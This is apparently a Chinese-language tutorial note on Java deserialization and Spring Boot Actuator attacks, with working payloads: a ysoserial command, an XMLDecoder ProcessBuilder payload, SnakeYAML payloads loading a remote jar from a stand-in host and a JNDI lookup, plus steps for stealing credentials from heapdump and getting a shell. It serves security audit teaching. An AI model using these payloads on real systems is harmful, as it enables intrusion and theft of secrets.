68:Java 原生反序列化 & SpringBoot 攻防

一、Java 原生反序列化

1. 基本原理

  • 序列化:对象 → 字节流

  • 反序列化:字节流 → 对象

  • 特征

    • 16进制:ac ed 00 05
    • Base64 开头:rO0AB
  • 漏洞本质:可控数据进入反序列化入口,触发恶意 readObject​ 实现 RCE。

2. 常见反序列化入口(白盒审计关键词)

  1. ObjectInputStream.readObject()
  2. XMLDecoder.readObject()
  3. SnakeYAML.load()
  4. JSON 类:Fastjson、Jackson(上节课内容)

3. 利用工具

  • ysoserial:最经典,生成反序列化 Payload

  • SerializedPayloadGenerator

  • Yakit 插件:图形化一键生成

  • 生成命令示例:

    复制代码
    java -jar ysoserial-all.jar CommonsCollections5 "cmd /c calc" | base64 -w0

4. 三类反序列化漏洞演示

(1)readObject 原生反序列化

漏洞代码:

复制代码
ObjectInputStream in = new ObjectInputStream(stream);
in.readObject();
  • 依赖第三方库利用链,如 CommonsCollections
  • 必须根据目标依赖选择对应利用链
(2)XMLDecoder 反序列化 RCE

漏洞代码:

复制代码
XMLDecoder decoder = new XMLDecoder(is);
decoder.readObject();

Payload:

复制代码
<java>
  <object class="java.lang.ProcessBuilder">
    <array length="1">
      <void index="0"><string>calc</string></void>
    </array>
    <void method="start"/>
  </object>
</java>

直接执行系统命令。

(3)SnakeYAML 反序列化 RCE

Yaml 可指定类与构造方法,高危。

Payload 1(远程加载 jar):

复制代码
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://x.com/evil.jar"]
  ]]
]

Payload 2(结合 JNDI):

复制代码
!!com.sun.rowset.JdbcRowSetImpl {
  dataSourceName: 'rmi://x.x.x.x/exp',
  autoCommit: true
}

受 JDK 版本、环境限制。


二、SpringBoot 框架攻防

1. 核心风险点:Actuator 未授权访问

Actuator 是 SpringBoot 监控组件,配置不当会泄露大量敏感接口:

  • /actuator
  • /env / /configprops:泄露配置、密钥、数据库账号
  • /heapdump:内存镜像,可提取密码、AK/SK
  • /jolokia:可配合 JNDI 实现 RCE

2. SpringBoot 识别方法

  • 白盒:看 pom.xml​ 是否引入 spring-boot-starter-actuator

  • 黑盒:

    • 白标签报错页
    • favicon.ico 小叶子图标
    • Wappalyzer、OWASP PentestKit 插件
    • 直接访问 /actuator

3. 黑盒利用工具清单

  • SpringBootVulExploit(LandGrey):利用合集
  • SpringBoot-Scan:批量扫描 Actuator 接口
  • APIKit(Burp 插件):被动发现 Actuator 泄露

4. heapdump 利用(实战高频)

  • 访问 /actuator/heapdump​ 下载内存文件

  • 工具解析:

    • JDumpSpider
    • heapdump_tool
  • 可搜索关键字:

    • password
    • accessKey
    • secret
    • jdbc
    • token

5. SpringBoot RCE 利用路线

  • Jolokia + Logback JNDI RCE

  • 流程:

    1. 启动本地 JNDI 服务
    2. 利用工具打 Jolokia 接口
    3. 成功后可接冰蝎/蚁剑

三、实战审计思路(本节重点)

  1. 看是否 SpringBoot → 扫 Actuator

  2. 看 heapdump/env → 拿账号密码、AK/SK

  3. 看依赖库(pom.xml)

    • commons-collections → 反序列化
    • log4j、fastjson → 组件漏洞
  4. 找反序列化入口函数:readObject​、XMLDecoder​、YAML#load​

  5. 不出网用 DNSlog,出网用 JNDI/RMI 拿 Shell


四、极简总结

  • Java 反序列化 = 可控字节流 + readObject 等入口 + 利用链 = RCE
  • SpringBoot 高危点 = Actuator 未授权访问 + heapdump 信息泄露 + Jolokia RCE
  • 工具:ysoserial、Yakit、SpringBootScan、heapdump_tool
相关推荐
学计算机的计算基9 分钟前
操作系统内存管理全解:虚拟内存、页表、COW、malloc、OOM一篇搞定
java·笔记·算法
tachibana213 分钟前
hot100 前 K 个高频元素(347)
java·数据结构·算法·leetcode
AOwhisky15 分钟前
Python 学习笔记(第五期)——组合数据类型:列表、元组、集合与字典精讲——核心知识点自测与详解
开发语言·笔记·python·学习·云计算
万亿少女的梦16832 分钟前
基于Spring Boot、Java与MySQL的网络订餐系统设计与实现
java·spring boot·mysql·系统设计·网络订餐
咩咩啃树皮9 小时前
第40篇:Vue3组件化开发精讲——组件拆分、复用、父子通信、工程化架构
java·前端·架构
灯澜忆梦9 小时前
GO_并发编程---定时器
开发语言·后端·golang
鱟鲥鳚9 小时前
Spring Boot 集成 LangChain4j:从模型调用到 Tool Calling(Demo版)
java·spring boot
-银雾鸢尾-10 小时前
C#中的StringBuilder相关方法
开发语言·c#
-银雾鸢尾-10 小时前
C#中结构体与类的区别;抽象类与接口的区别
开发语言·c#
大模型码小白11 小时前
【Python零基础教程】继承、多态与魔法函数:面向对象编程三大核心特性详解
java·大数据·开发语言·人工智能·python·ai编程